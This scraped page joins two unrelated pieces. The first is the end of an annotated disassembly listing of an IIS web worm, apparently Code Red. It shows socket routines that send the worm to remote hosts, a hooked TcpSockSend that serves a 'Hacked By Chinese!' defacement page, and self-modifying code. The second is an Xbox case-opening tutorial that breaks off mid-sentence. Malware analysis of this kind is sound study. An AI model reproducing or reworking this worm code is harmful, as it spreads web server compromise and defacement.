8B 95 78 FE FF FF mov edx, [ebp-188h] ; push socket descriptor<br />seg000:00000C05 52 push edx<br />seg000:00000C06 FF 95 C0 FE FF FF call dword ptr [ebp-140h] ; send<br />seg000:00000C0C 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:00000C0E 90 nop ; No Operation<br />seg000:00000C0F 43 inc ebx ; Increment by 1<br />seg000:00000C10 4B dec ebx ; Decrement by 1<br />seg000:00000C11 43 inc ebx ; Increment by 1<br />seg000:00000C12 4B dec ebx ; Decrement by 1<br />seg000:00000C13 8B 45 08 mov eax, [ebp+8] ; get data request size<br />seg000:00000C16 8B 48 70 mov ecx, [eax+70h]<br />seg000:00000C19 89 8D 4C FE FF FF mov [ebp-1B4h], ecx ; set counter to data request size<br />seg000:00000C1F 8B F4 mov esi, esp<br />seg000:00000C21 6A 00 push 0 ; no flags<br />seg000:00000C23 8B 95 4C FE FF FF mov edx, [ebp-1B4h] ; push request size<br />seg000:00000C29 52 push edx<br />seg000:00000C2A 8B 45 08 mov eax, [ebp+8]<br />seg000:00000C2D 8B 48 78 mov ecx, [eax+78h] ; get and push data request<br />seg000:00000C30 51 push ecx<br />seg000:00000C31 8B 95 78 FE FF FF mov edx, [ebp-188h] ; push sock desc<br />seg000:00000C37 52 push edx<br />seg000:00000C38 FF 95 C0 FE FF FF call dword ptr [ebp-140h] ; send<br />seg000:00000C38 ; this sends the actual malicious code to the remote side<br />seg000:00000C3E 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:00000C40 90 nop ; No Operation<br />seg000:00000C41 43 inc ebx ; Increment by 1<br />seg000:00000C42 4B dec ebx ; Decrement by 1<br />seg000:00000C43 43 inc ebx ; Increment by 1<br />seg000:00000C44 4B dec ebx ; Decrement by 1<br />seg000:00000C45 C6 85 FC FE FF FF+ mov byte ptr [ebp-104h], 0 ; set ebp-104 to 0<br />seg000:00000C4C 8B F4 mov esi, esp<br />seg000:00000C4E 6A 00 push 0 ; no flags<br />seg000:00000C50 68 00 01 00 00 push 100h ; set 100 len<br />seg000:00000C55 8D 85 FC FE FF FF lea eax, [ebp-104h] ; push addr of ebp-104<br />seg000:00000C5B 50 push eax<br />seg000:00000C5C 8B 8D 78 FE FF FF mov ecx, [ebp-188h] ; push sockdesc<br />seg000:00000C62 51 push ecx<br />seg000:00000C63 FF 95 C4 FE FF FF call dword ptr [ebp-13Ch] ; recv<br />seg000:00000C63 ;<br />seg000:00000C63 ; receive a response from the remote side<br />seg000:00000C69 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:00000C6B 90 nop ; No Operation<br />seg000:00000C6C 43 inc ebx ; Increment by 1<br />seg000:00000C6D 4B dec ebx ; Decrement by 1<br />seg000:00000C6E 43 inc ebx ; Increment by 1<br />seg000:00000C6F 4B dec ebx ; Decrement by 1<br />seg000:00000C70 89 85 4C FE FF FF mov [ebp-1B4h], eax ; set counter to data received from recv<br />seg000:00000C76<br />seg000:00000C76 SOCK_CLOSE_LOOP: ; CODE XREF: HACK_PAGE+432j<br />seg000:00000C76 8B F4 mov esi, esp<br />seg000:00000C78 8B 95 78 FE FF FF mov edx, [ebp-188h]<br />seg000:00000C7E 52 push edx<br />seg000:00000C7F FF 95 C8 FE FF FF call dword ptr [ebp-138h] ; closesocket<br />seg000:00000C85 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:00000C87 90 nop ; No Operation<br />seg000:00000C88 43 inc ebx ; Increment by 1<br />seg000:00000C89 4B dec ebx ; Decrement by 1<br />seg000:00000C8A 43 inc ebx ; Increment by 1<br />seg000:00000C8B 4B dec ebx ; Decrement by 1<br />seg000:00000C8C<br />seg000:00000C8C loc_C8C: ; this exits from sub 224, not positive of the end result.<br />seg000:00000C8C E9 0C FB FF FF jmp DO_THE_WORK<br />seg000:00000C91 ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:00000C91<br />seg000:00000C91 TIGHT_LOOP: ; CODE XREF: DO_RVA+230j<br />seg000:00000C91 ; HACK_PAGE+155j ...<br />seg000:00000C91 EB FE jmp short TIGHT_LOOP ; This is a tight loop<br />seg000:00000C91 HACK_PAGE endp<br />seg000:00000C91<br />seg000:00000C93 ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:00000C93<br />seg000:00000C93 JUMP_TABLE1: ; CODE XREF: DataSetup+1Cj<br />seg000:00000C93 E8 8C F5 FF FF call DO_RVA ; Call Procedure<br />seg000:00000C98 EB 30 jmp short HOOK_FAKE_TCPSOCKSEND ; ebp-1a0 it seems<br />seg000:00000C9A<br />seg000:00000C9A ; ۛۛۛۛۛۛۛ۠S U B R O U T I N E ۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۍ<br />seg000:00000C9A<br />seg000:00000C9A ; This is a fake tcpsocksend that replaces the current one.<br />seg000:00000C9A ; it serves to deliver the hacked page when inititalized<br />seg000:00000C9A<br />seg000:00000C9A FAKE_TCPSOCKSEND proc near ; CODE XREF: seg000:00000CCAp<br />seg000:00000C9A<br />seg000:00000C9A var_C = dword ptr -0Ch<br />seg000:00000C9A arg_4 = dword ptr 8<br />seg000:00000C9A<br />seg000:00000C9A 58 pop eax<br />seg000:00000C9B 83 C0 05 add eax, 5 ; Add<br />seg000:00000C9E 55 push ebp<br />seg000:00000C9F 57 push edi<br />seg000:00000CA0 53 push ebx<br />seg000:00000CA1 56 push esi<br />seg000:00000CA2 50 push eax<br />seg000:00000CA3 6A 3C push 3Ch ; '<'<br />seg000:00000CA5 8B F0 mov esi, eax<br />seg000:00000CA7 83 C6 0C add esi, 0Ch ; Add<br />seg000:00000CAA 56 push esi<br />seg000:00000CAB 68 00 01 00 00 push 100h<br />seg000:00000CB0 FF 70 08 push dword ptr [eax+8]<br />seg000:00000CB3 FF 74 24 28 push [esp+20h+arg_4]<br />seg000:00000CB7 FF 10 call dword ptr [eax] ; Indirect Call Near Procedure<br />seg000:00000CB9 58 pop eax<br />seg000:00000CBA 50 push eax<br />seg000:00000CBB FF 74 24 18 push [esp+24h+var_C]<br />seg000:00000CBF FF 50 04 call dword ptr [eax+4] ; Indirect Call Near Procedure<br />seg000:00000CC2 58 pop eax<br />seg000:00000CC3 5E pop esi<br />seg000:00000CC4 5B pop ebx<br />seg000:00000CC5 5F pop edi<br />seg000:00000CC6 5D pop ebp<br />seg000:00000CC7 FF 20 jmp dword ptr [eax] ; Indirect Near Jump<br />seg000:00000CC7 FAKE_TCPSOCKSEND endp<br />seg000:00000CC7<br />seg000:00000CC7 ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:00000CC9 90 db 90h ; ?<br />seg000:00000CCA ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:00000CCA<br />seg000:00000CCA HOOK_FAKE_TCPSOCKSEND: ; CODE XREF: seg000:00000C98j<br />seg000:00000CCA ; seg000:00000CD4j<br />seg000:00000CCA E8 CB FF FF FF call FAKE_TCPSOCKSEND ; This is a fake tcpsocksend that replaces the current one.<br />seg000:00000CCA ; it serves to deliver the hacked page when inititalized<br />seg000:00000CCF<br />seg000:00000CCF HACK_PAGE_JUMP: ; CODE XREF: DO_RVA+426j<br />seg000:00000CCF E8 7B F9 FF FF call HACK_PAGE ; this sets up the hacked page bit<br />seg000:00000CD4 EB F8 jmp short near ptr HOOK_FAKE_TCPSOCKSEND+4 ; Jump<br />seg000:00000CD4 ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:00000CD6 22 PADDING_BYTES db 22h ; "<br />seg000:00000CD7 6E db 6Eh ; n<br />seg000:00000CD8 84 db 84h ; ?<br />seg000:00000CD9 32 db 32h ; 2<br />seg000:00000CDA 03 db 3 ;<br />seg000:00000CDB 75 db 75h ; u<br />seg000:00000CDC B3 db 0B3h ; ?<br />seg000:00000CDD CA db 0CAh ; ʍ<br />seg000:00000CDE 5A db 5Ah ; Z<br />seg000:00000CDF 04 db 4 ;<br />seg000:00000CE0 56 db 56h ; V<br />seg000:00000CE1 34 db 34h ; 4<br />seg000:00000CE2 12 db 12h ;<br />seg000:00000CE3 B8 db 0B8h ; ?<br />seg000:00000CE4 78 db 78h ; x<br />seg000:00000CE5 56 db 56h ; V<br />seg000:00000CE6 34 db 34h ; 4<br />seg000:00000CE7 12 db 12h ;<br />seg000:00000CE8 B8 db 0B8h ; ?<br />seg000:00000CE9 78 db 78h ; x<br />seg000:00000CEA 56 db 56h ; V<br />seg000:00000CEB 34 db 34h ; 4<br />seg000:00000CEC 12 db 12h ;<br />seg000:00000CED<br />seg000:00000CED ; ۛۛۛۛۛۛۛ۠S U B R O U T I N E ۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۍ<br />seg000:00000CED<br />seg000:00000CED ; This function:<br />seg000:00000CED ; sets up edi<br />seg000:00000CED ; dynamically rewrites a bit of worm code to point to the head of the code<br />seg000:00000CED<br />seg000:00000CED DO_REWRITE proc near ; CODE XREF: DO_RVA+29p<br />seg000:00000CED 58 pop eax<br />seg000:00000CEE 50 push eax<br />seg000:00000CEF 8B BD 68 FE FF FF mov edi, [ebp-198h] ; put an addr into edi<br />seg000:00000CF5 89 47 F2 mov [edi-0Eh], eax ; dynamically rewrite jump addr at o.D02<br />seg000:00000CF8 C3 retn ; Return Near from Procedure<br />seg000:00000CF8 DO_REWRITE endp<br />seg000:00000CF8<br />seg000:00000CF9 ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:00000CF9<br />seg000:00000CF9 SELF_MODIFY1: ; CODE XREF: seg000:00000D0Bj<br />seg000:00000CF9 8B 44 24 0C mov eax, [esp+0Ch]<br />seg000:00000CFD 05 B8 00 00 00 add eax, 0B8h ; '?' ; Add<br />seg000:00000D02 C7 00 DA F1 CD 00 mov dword ptr [eax], 0CDF1DAh ; this is self modifiying code. the move value gets set to RVA LOOP(o 252)<br />seg000:00000D08 33 C0 xor eax, eax ; Logical Exclusive OR<br />seg000:00000D0A C3 retn ; Return Near from Procedure<br />seg000:00000D0B ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:00000D0B EB EC jmp short SELF_MODIFY1 ; Jump<br />seg000:00000D0D ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:00000D0D<br />seg000:00000D0D WORMCONTINUE: ; CODE XREF: WORM+28j<br />seg000:00000D0D E8 F1 F4 FF FF call DataSetup ; Call Procedure<br />seg000:00000D0D ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:00000D12 4C 6F 61 64 4C 69+aLoadlibrarya db 'LoadLibraryA',0<br />seg000:00000D1F 47 65 74 53 79 73+aGetsystemtime db 'GetSystemTime',0<br />seg000:00000D2D 43 72 65 61 74 65+aCreatethread db 'CreateThread',0<br />seg000:00000D3A 43 72 65 61 74 65+aCreatefilea db 'CreateFileA',0<br />seg000:00000D46 53 6C 65 65 70 00 aSleep db 'Sleep',0<br />seg000:00000D4C 47 65 74 53 79 73+aGetsystemdefau db 'GetSystemDefaultLangID',0<br />seg000:00000D63 56 69 72 74 75 61+aVirtualprotect db 'VirtualProtect',0<br />seg000:00000D72 09 db 9 ;<br />seg000:00000D73 69 6E 66 6F 63 6F+aInfocomm_dll db 'infocomm.dll',0<br />seg000:00000D80 54 63 70 53 6F 63+aTcpsocksend db 'TcpSockSend',0<br />seg000:00000D8C 09 db 9 ;<br />seg000:00000D8D 57 53 32 5F 33 32+aWs2_32_dll db 'WS2_32.dll',0<br />seg000:00000D98 73 6F 63 6B 65 74+aSocket db 'socket',0<br />seg000:00000D9F 63 6F 6E 6E 65 63+aConnect db 'connect',0<br />seg000:00000DA7 73 65 6E 64 00 aSend db 'send',0<br />seg000:00000DAC 72 65 63 76 00 aRecv db 'recv',0<br />seg000:00000DB1 63 6C 6F 73 65 73+aClosesocket db 'closesocket',0<br />seg000:00000DBD 09 db 9 ;<br />seg000:00000DBE 77 33 73 76 63 2E+aW3svc_dll db 'w3svc.dll',0<br />seg000:00000DC8 00 db 0 ;<br />seg000:00000DC9 47 45 54 20 00 aGet db 'GET ',0<br />seg000:00000DCE 3F db 3Fh ; ?<br />seg000:00000DCF 00 db 0 ;<br />seg000:00000DD0 20 20 48 54 54 50+aHttp1_0Content db ' HTTP/1.0',0Dh,0Ah<br />seg000:00000DD0 2F 31 2E 30 0D 0A+ db 'Content-type: text/xml',0Ah<br />seg000:00000DD0 43 6F 6E 74 65 6E+ db 'HOST:www.worm.com',0Ah<br />seg000:00000DD0 74 2D 74 79 70 65+ db ' Accept: */*',0Ah<br />seg000:00000DD0 3A 20 74 65 78 74+ db 'Content-length: 3569 ',0Dh,0Ah<br />seg000:00000DD0 2F 78 6D 6C 0A 48+ db 0Dh,0Ah,0<br />seg000:00000E2C 63 3A 5C 6E 6F 74+aCNotworm db 'c:\notworm',0<br />seg000:00000E37 4C 4D 54 48 0D 0A+aLmthHtmlHeadMe db 'LMTH',0Dh,0Ah<br />seg000:00000E37 3C 68 74 6D 6C 3E+ db '<html><head><meta http-equiv="Content-Type" content="text/ht'<br />seg000:00000E37 3C 68 65 61 64 3E+ db 'ml; charset=english"><title>HELLO!
seg000:00000E37 3C 6D 65 74 61 20+ db 'ize=5>

Welcome to http://'
seg000:00000E37 68 74 74 70 2D 65+ db 'www.worm.com !

Hacked By Chinese!<'
seg000:00000E37 71 75 69 76 3D 22+ db '/html> '
seg000:00000E37 43 6F 6E 74 65 6E+ db ' '
seg000:00000E37 74 2D 54 79 70 65+ db ' '
seg000:00000E37 22 20 63 6F 6E 74+seg000 ends
seg000:00000E37 65 6E 74 3D 22 74+
seg000:00000E37 65 78 74 2F 68 74+
seg000:00000E37 6D 6C 3B 20 63 68+ end

Saturday, January 06, 2007



Open Xbox PARTI: Stuff you need

Tutorial written by:<<-®ReNeG@de-®>>

All Xbox models are opened the same way, so it will work for sure on your Xbox







You need 2 Torx screw drivers




Don't start without those 2 screw drivers or you'll nuke your xbox



Open Xbox PART II: Open the case

A normal unopened Xbox console.





Turn you xbox upsidedown. Under each foot you will find a screw and under 2 of the stickers there's a screw. (6 in total) Use a Torx 20 to unscrew these



Remove the "foot" to access the screw





Remove warranty/MS sticker to access screw.






Remove serial sticker to access the screw





Now lift the top on the Xboxcase.





There you go ... TOP is removed and you can now see the DVD-drive (left) and HDD (right).





Open Xbox PART III: Remove HDD

You removed the TOP of your Xbox. You can now see the HDD on the right side of this image.





Remove the IDE-cable on the back on the HDD.




IDE-cable removed.


Unscrew this screw with a Torx10


(lift it up to remove)


HDD is removed from Xbox. You can also disconnect the powercable if you want, but the wire is pretty long so you don't really have to.
If you want you can also remove the HDD from its plastic tray (just a few screws on the sides) , but there's no real need to do that.




Open Xbox PART IV: Remove DVD-drive

Remove the IDE-cable on the back of the DVD-drive




IDE-cable removed!






There are 2 screws on each side of the DVD-drive. Unscrew them with a Torx10.


Left side screw.




Right side screw.







You can now remove the DVD-drive by lifting the tray upwards. If something is blocking, check the front side of the Xbox DVD-drive and make sure that small metallic plate isn't screwing up



Remove the yellow power cable. You can do it with your hands or if it doesn't work, try with a screwdriver. Make sure you don't screw up thought. This power cable is Xbox